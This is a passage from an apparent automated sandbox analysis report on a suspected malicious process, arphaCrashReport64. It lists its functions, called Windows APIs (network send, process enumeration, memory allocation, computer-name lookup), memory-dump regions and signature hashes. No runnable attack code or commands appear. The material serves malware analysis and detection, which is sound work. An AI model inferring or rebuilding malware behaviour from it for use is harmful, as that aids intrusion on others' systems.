                                              • Part of subcall function 00007FFDFB8B1EA8: HeapFree.KERNEL32(?,?,?,00007FFDFB8B16FD), ref: 00007FFDFB8B1EBE
                                              • Part of subcall function 00007FFDFB8B1EA8: _errno.LIBCMT ref: 00007FFDFB8B1EC8
                                              • Part of subcall function 00007FFDFB8B1EA8: GetLastError.KERNEL32(?,?,?,00007FFDFB8B16FD), ref: 00007FFDFB8B1ED0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                            • String ID:
                                            • API String ID: 1549890855-0
                                            • Opcode ID: 40821d3dc59cbf3c64e4d84b918f9b165b5e38ad200d41ae6754068b14a37dbd
                                            • Instruction ID: 923e673d9eee33d3e3d55d6f9a1295ea685fd6411714e4d4120c4fae93409040
                                            • Opcode Fuzzy Hash: 40821d3dc59cbf3c64e4d84b918f9b165b5e38ad200d41ae6754068b14a37dbd
                                            • Instruction Fuzzy Hash: 2D31DC20F3A24381FB647B715832ABA5A849FD1358F10C934E83E891FEEE2CB4405DE1
                                            Function 00007FF6E2D56790 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904633402.00007FF6E2D51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6E2D50000, based on PE: true
                                            • Associated: 00000002.00000002.2904616051.00007FF6E2D50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904656659.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904680982.00007FF6E2D82000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904701121.00007FF6E2D85000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ff6e2d50000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Window$DumpLocal$CommandCriticalLineSection$ArgvCommonControlsCurrentDestroyEnterInitInitializeLeaveThreadUninitialize
                                            • String ID:
                                            • API String ID: 4232477309-0
                                            • Opcode ID: 6016dd98208aa9a108adf78c0108ff9928f39f32039d0d110344441888cf9f30
                                            • Instruction ID: f4d68be708cb3a4cad1f6513293113aed07b7d0bf82bf5f4a4165cba9695a9c6
                                            • Opcode Fuzzy Hash: 6016dd98208aa9a108adf78c0108ff9928f39f32039d0d110344441888cf9f30
                                            • Instruction Fuzzy Hash: B8314A23E08A4286EA149F21E8543797362FF44F88F484635DB4D87695CFFEE404C7AA
                                            Function 00007FFDFB8B4FD0 Relevance: 9.1, APIs: 6, Instructions: 122COMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                            • String ID:
                                            • API String ID: 2878544890-0
                                            • Opcode ID: e7b31d940b5e61bc55c6da1b419915fdda316d163dca5b5054fd05ae409f7391
                                            • Instruction ID: ad70ebcacc190eecabd35582dfed1618f40a5e7ad0bb4ce8cb4695d3d1257d88
                                            • Opcode Fuzzy Hash: e7b31d940b5e61bc55c6da1b419915fdda316d163dca5b5054fd05ae409f7391
                                            • Instruction Fuzzy Hash: 5751A022B2A64386E7549B359430AB9B691FBC4B54F18C535D67E472FACF3CE441CB80
                                            Function 0000024B645930BC Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                            • String ID:
                                            • API String ID: 3283625137-0
                                            • Opcode ID: 682c3161d626f3e06a97a55f13333c3dfc29333ffe79b4f3941292e52bca3446
                                            • Instruction ID: 5dc0dccdecf641e3368973405667048cf0e06815030f94dbbbbe5b3a00688606
                                            • Opcode Fuzzy Hash: 682c3161d626f3e06a97a55f13333c3dfc29333ffe79b4f3941292e52bca3446
                                            • Instruction Fuzzy Hash: B6219521204FC4C6EA16DBA5A94939EB39AFB48BD0F454625AF6D03BDADF38C4518708
                                            Function 0000024B645921D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ComputerNamelstrcpywsprintf
                                            • String ID: SOFTWARE\%sW\$UnKnow
                                            • API String ID: 2045598086-1925786254
                                            • Opcode ID: ce4fb7f75d1219ad2289e25997fa7daa82040d6d259ef8843f123cfa3a06188e
                                            • Instruction ID: c2ee2518e7be970ba9f7e4b0b1bd849d2df448d249dafbf1fa38d551c6482896
                                            • Opcode Fuzzy Hash: ce4fb7f75d1219ad2289e25997fa7daa82040d6d259ef8843f123cfa3a06188e
                                            • Instruction Fuzzy Hash: 38117C61224DC191FF22DB11E8487DA636BF798748F820012D74D47AADEB3DC149CB19
                                            Function 00007FFDFB8B1390 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: HandleLibraryLoadModule
                                            • String ID: Advapi32.dll$Kernel32.dll
                                            • API String ID: 4133054770-3188642331
                                            • Opcode ID: 418ce45b5ec06e1b2862c4412dc0c3816f81b2d1ecedce3597085fe4abdcdff0
                                            • Instruction ID: e42b8539253b12201921c20e40a033cfdd9d436649593b643a311497dd09c20d
                                            • Opcode Fuzzy Hash: 418ce45b5ec06e1b2862c4412dc0c3816f81b2d1ecedce3597085fe4abdcdff0
                                            • Instruction Fuzzy Hash: 79E04C34F2BA07D5EB509B21A8A596423A5FBD5301F908031C16D423F8EE7DA5598B80
                                            Function 00007FFDFB8B4D58 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00007FFDFB8B4CC8: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFDFB8B500A,?,?,?,?,?,00007FFDFB8B51DF), ref: 00007FFDFB8B4CF2
                                            • IsValidCodePage.KERNEL32(?,?,?,00000000,00000000,00000000,?,00007FFDFB8B5050,?,?,?,?,?,00007FFDFB8B51DF), ref: 00007FFDFB8B4DDB
                                            • GetCPInfo.KERNEL32(?,?,?,00000000,00000000,00000000,?,00007FFDFB8B5050,?,?,?,?,?,00007FFDFB8B51DF), ref: 00007FFDFB8B4DF0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CodeInfoPageValid
                                            • String ID: ExW
                                            • API String ID: 546120528-2616828304
                                            • Opcode ID: 9ec4cdaa8fe45a7dc26e4c49f13c391a527cd7fe7a4114bc5d8f532e0099a1ca
                                            • Instruction ID: d9e3c0070382d248a7e53d593e9105b64e407916e12bed41794b000762c8ad3d
                                            • Opcode Fuzzy Hash: 9ec4cdaa8fe45a7dc26e4c49f13c391a527cd7fe7a4114bc5d8f532e0099a1ca
                                            • Instruction Fuzzy Hash: 3A71E1A2F2A28346FB748B34907197D6691ABC0744F4CC036D76E476E9DE3CEA45CB80
                                            Function 0000024B6458ED81 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Window$CurrentProcessThread$CountForegroundInfoInputLastTextTickmalloc
                                            • String ID:
                                            • API String ID: 3323085477-0
                                            • Opcode ID: 44b1e6e62a3808914b2990803f0d3b32f4d0b914e85da03f9fa56ac4a72c0795
                                            • Instruction ID: 0fe2111aa0834e572798849750406e4a1690db1d622661f68280fcaccb2b3fd3
                                            • Opcode Fuzzy Hash: 44b1e6e62a3808914b2990803f0d3b32f4d0b914e85da03f9fa56ac4a72c0795
                                            • Instruction Fuzzy Hash: 0C112922614A808ADF46DF36B84835D66A6E789B40F458425EF4A87B8DEF7CC884C744
                                            Function 0000024B64583080 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Process32$ChangeCloseFindFirstNextNotification_errno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1362859326-0
                                            • Opcode ID: 38c2abb4abafc69136a7456c2adf4735da2ec9da11d856ab3c788e6b6e9f4e49
                                            • Instruction ID: 3bf132e2aeb9256efeca026ad996d9c8b78c2b1238340d76328b0feaa75b9f8d
                                            • Opcode Fuzzy Hash: 38c2abb4abafc69136a7456c2adf4735da2ec9da11d856ab3c788e6b6e9f4e49
                                            • Instruction Fuzzy Hash: 75114F36314E9086E7128B22A81875BB7A9F748FE4F554612EE5943B98DF38C448C708
                                            Function 0000024B6458E907 Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Window$CurrentProcessThread$CountForegroundInfoInputLastTextTickmalloc
                                            • String ID:
                                            • API String ID: 3323085477-0
                                            • Opcode ID: 53f4fb6f92e301a670ffe44a7bcae88315d6365779e7b2565db4d3ad9d44070f
                                            • Instruction ID: 25e0c8ed0f3e99a0f7461cc45056cbf6d0fa5fdffe0db8de1a9c62403b613706
                                            • Opcode Fuzzy Hash: 53f4fb6f92e301a670ffe44a7bcae88315d6365779e7b2565db4d3ad9d44070f
                                            • Instruction Fuzzy Hash: F911EB22710A8086EB45DF26F44835D67A6E788B80F059415FF4A47B8DDF78C484C744
                                            Function 0000024B645983F4 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Heap$CreateInformationVersion
                                            • String ID:
                                            • API String ID: 3563531100-0
                                            • Opcode ID: 9ef408723e01272be0652c1ccd660a47e6133f0586bb4a4d1fd94ecd904275c3
                                            • Instruction ID: 1928824ced2ac8bc0ceb9cface186014c586f7c3582b5d211aad3101d471fb82
                                            • Opcode Fuzzy Hash: 9ef408723e01272be0652c1ccd660a47e6133f0586bb4a4d1fd94ecd904275c3
                                            • Instruction Fuzzy Hash: 47E09B34612EC042F7C65B20A84D779225AFF54344F415415D50E0279CEF3CC09A8709
                                            Function 00007FFDFB8B497C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Info
                                            • String ID:
                                            • API String ID: 1807457897-3916222277
                                            • Opcode ID: a25030c6f73ece0fe48594fa4548755820865811698b87b855136faf09de3d18
                                            • Instruction ID: 58a3153c5cab035394b43766d6e7a30af65c61c82d495ecde61b1dfdfb52ab63
                                            • Opcode Fuzzy Hash: a25030c6f73ece0fe48594fa4548755820865811698b87b855136faf09de3d18
                                            • Instruction Fuzzy Hash: D951813262D6C286E7218F35E0517AEBBA0F788744F588235D79D43A99DB3DD406CF40
                                            Function 0000024B64582900 Relevance: 3.1, APIs: 2, Instructions: 65networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: a7a69a6c44eae31ac87e71d4d49eb2ed0d436db1612ea634298a4d147ca241f4
                                            • Instruction ID: 4cd18f9ae869d40063476a69489d99920837a8c6a7df04591afe31691105f8af
                                            • Opcode Fuzzy Hash: a7a69a6c44eae31ac87e71d4d49eb2ed0d436db1612ea634298a4d147ca241f4
                                            • Instruction Fuzzy Hash: 90210532700EA148F3214B16B8497A9BA99FB89BD0F551236EE5883FD9EF74C4C28304
                                            Function 0000024B64583430 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ComputerCurrentNameProfile
                                            • String ID:
                                            • API String ID: 3082751485-0
                                            • Opcode ID: e2a9adb5299dfcb7f963bcc1a221c1a79a9d13bacd767ea76fef39f5dd3caca1
                                            • Instruction ID: 802a41f69062f8d53ac914020f8392eb79e5d35dceeecafe0e32a42c893e28a5
                                            • Opcode Fuzzy Hash: e2a9adb5299dfcb7f963bcc1a221c1a79a9d13bacd767ea76fef39f5dd3caca1
                                            • Instruction Fuzzy Hash: 4D216B22218BC095EB70CF24E45439FB7A2F788764F405316EAAD83AD9DB3DC109CB15
                                            Function 00007FFDFB8B51F0 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _errno.LIBCMT ref: 00007FFDFB8B5213
                                              • Part of subcall function 00007FFDFB8B2464: DecodePointer.KERNEL32 ref: 00007FFDFB8B248B
                                            • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFDFB8B2D03,?,?,?,00007FFDFB8B29F3,?,?,?,00007FFDFB8B253D), ref: 00007FFDFB8B525C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AllocateDecodeHeapPointer_errno
                                            • String ID:
                                            • API String ID: 15861996-0
                                            • Opcode ID: bb8eed43e8797b31d408fed5b93d30ae15ba08089fb6024745d6490033012783
                                            • Instruction ID: 89611c15c2d22be072a5d9e5f551be703158a8641b4f819feea8f48af4587d39
                                            • Opcode Fuzzy Hash: bb8eed43e8797b31d408fed5b93d30ae15ba08089fb6024745d6490033012783
                                            • Instruction Fuzzy Hash: 81115121B2B24385FF555B75D635BB972916FD47A4F08C630CA3D066EEDE6CD4018E80
                                            Function 0000024B645819A0 Relevance: 3.1, APIs: 2, Instructions: 51networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CreateEventStartup
                                            • String ID:
                                            • API String ID: 1546077022-0
                                            • Opcode ID: 2818f70f87d22685dae2d894ab73b2053dca43e1e2db7108a8644fd358597901
                                            • Instruction ID: 7785598965e095c0c59a731df039a37127d06a62f8776684757aaca69457dd09
                                            • Opcode Fuzzy Hash: 2818f70f87d22685dae2d894ab73b2053dca43e1e2db7108a8644fd358597901
                                            • Instruction Fuzzy Hash: DA210C32201F8486D7158F19F85439DB3E9F758B58F25422ACB9847BA4DF36C067C740
                                            Function 00007FFDFB8B3B20 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Heap$CreateInformation
                                            • String ID:
                                            • API String ID: 1774340351-0
                                            • Opcode ID: 308323cf0e965bc60dd3766130036a00e0fb6afe90f427625239b759be2b3a8c
                                            • Instruction ID: 2ada06e2173cff7447b2535bbbd54aa36c6d46f0005072dddf2a25ac1c00605e
                                            • Opcode Fuzzy Hash: 308323cf0e965bc60dd3766130036a00e0fb6afe90f427625239b759be2b3a8c
                                            • Instruction Fuzzy Hash: C8E04F75B3778292E7889B36A825B656290FBC8740F809039E95E027ECDF3CD1458E40
                                            Function 0000024B64581370 Relevance: 2.6, APIs: 2, Instructions: 62memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: ec9b96369609cc7b76882b531fbdd83dd41e6b39cdc7d89fc169277994d9546c
                                            • Instruction ID: 0b970ee62aeaf9f3d11928011b6015d731f685c82966dd420a31442a527285a5
                                            • Opcode Fuzzy Hash: ec9b96369609cc7b76882b531fbdd83dd41e6b39cdc7d89fc169277994d9546c
                                            • Instruction Fuzzy Hash: 0621D432710E908BD749CB2AE54431DB7A6F788B80F158521EB5AD3B1CEF34D8E28B44
                                            Function 0000024B645812B0 Relevance: 2.6, APIs: 2, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 90bdbeb053a759dfb6172123d893b3ef7054f36a6b9beffb9720844b7b812231
                                            • Instruction ID: ab54c17ffca7753e96d66ecbbf4a0da041aa946524e87b72758098ccc415f621
                                            • Opcode Fuzzy Hash: 90bdbeb053a759dfb6172123d893b3ef7054f36a6b9beffb9720844b7b812231
                                            • Instruction Fuzzy Hash: 2311C831710F808AD75ACF36A544619B7AAE794BC4F188125EA9A83B5CEF38C8D5CB44
                                            Function 00007FFDFB8B2C64 Relevance: 2.5, APIs: 2, Instructions: 30sleepCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • malloc.LIBCMT ref: 00007FFDFB8B2C83
                                              • Part of subcall function 00007FFDFB8B1D34: _FF_MSGBANNER.LIBCMT ref: 00007FFDFB8B1D64
                                              • Part of subcall function 00007FFDFB8B1D34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFDFB8B2C88,?,?,00000000,00007FFDFB8B43D5,?,?,?,00007FFDFB8B447F), ref: 00007FFDFB8B1D89
                                              • Part of subcall function 00007FFDFB8B1D34: _errno.LIBCMT ref: 00007FFDFB8B1DAD
                                              • Part of subcall function 00007FFDFB8B1D34: _errno.LIBCMT ref: 00007FFDFB8B1DB8
                                            • Sleep.KERNEL32(?,?,00000000,00007FFDFB8B43D5,?,?,?,00007FFDFB8B447F), ref: 00007FFDFB8B2C9A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$AllocateHeapSleepmalloc
                                            • String ID:
                                            • API String ID: 4275769124-0
                                            • Opcode ID: 2024ef6d46135b65a82486e01a40526ee360ed3e040809e9ef4306df607f230c
                                            • Instruction ID: 0920fd3f350b82bbd9aa1041619897e0f454ca0e62397d897b417a7c5645b392
                                            • Opcode Fuzzy Hash: 2024ef6d46135b65a82486e01a40526ee360ed3e040809e9ef4306df607f230c
                                            • Instruction Fuzzy Hash: D0F0A931B2A64781EB40AF25A4604697650ABC4750F548134EA6D077A9CF3CD8518B80
                                            Function 0000024B626A0BA8 Relevance: 1.6, APIs: 1, Instructions: 81libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2903813553.0000024B626A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000024B626A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
